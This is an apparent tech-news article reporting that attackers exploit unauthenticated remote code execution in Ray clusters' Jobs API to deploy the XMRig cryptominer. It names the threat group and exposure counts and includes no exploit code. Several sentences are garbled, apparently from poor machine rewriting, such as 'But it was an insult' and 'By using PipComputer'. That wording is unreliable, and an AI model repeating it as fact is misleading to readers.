- Ray clusters remain vulnerable to remote code execution via the Jobs API without authentication.
- Threat group “IronErn440” exploits vulnerability in AI-generated payloads using XMRig cryptojacker
- There are over 230,000 Ray servers available online, up from a few thousand in 2023.
Ray clusters, still vulnerable to a critical vulnerability discovered years ago, are being used for cryptocurrency mining, data theft, and even distributed denial of service (DDoS attacks) attacks, experts warn.
Oligo cybersecurity researchers say this is the second major campaign to exploit the same flaw.
Ray is open source network that helps you work Python programs faster due to decentralization and distribution of work among several machines. Its clusters are groups of computers—one head node and multiple worker nodes—that work together to execute Ray tasks and workloads in a distributed and coordinated manner.
Expanding and hiding XMRig
Back in 2023, Ray 2.6.3 and 2.8.0 were discovered to contain a vulnerability that could allow a remote attacker to execute arbitrary code via the job submission API. However, Anyscale, the company that developed the product, has not patched it because it is designed to operate in a “highly controlled network environment.”
In other words, users must protect their infrastructure and ensure that the vulnerability is not abused.
But it was an insult. First from September 2023 to March 2024 and today. Oligo says attackers tracked as “IronErn440” are now using AI-generated payloads to infiltrate vulnerable clusters. Taking advantage of this bug, attackers submit jobs to the Job API without authentication, running multi-stage Bash and Python payloads hosted on GitHub and GitLab.
These payloads are deployed malware to devices – usually the notorious XMRig cryptojacker. While this cryptojacker is usually easy to detect (since it takes 100% of the device's processing power and renders it useless for almost anything else), attackers have tried to get around this problem by limiting its processing power to 60%.
There are more than 230,000 Ray servers connected to the Internet today, the researchers warned, saying the number has grown significantly from the “several thousand” that were available when the vulnerability was first discovered.
By using PipComputer
The best antivirus for any budget
Follow TechRadar on Google News. And add us as your preferred source to get our expert news, reviews and opinions in your feeds. Be sure to click the “Subscribe” button!
And of course you can also Follow TechRadar on TikTok for news, reviews, unboxing videos and get regular updates from us on whatsapp too much.
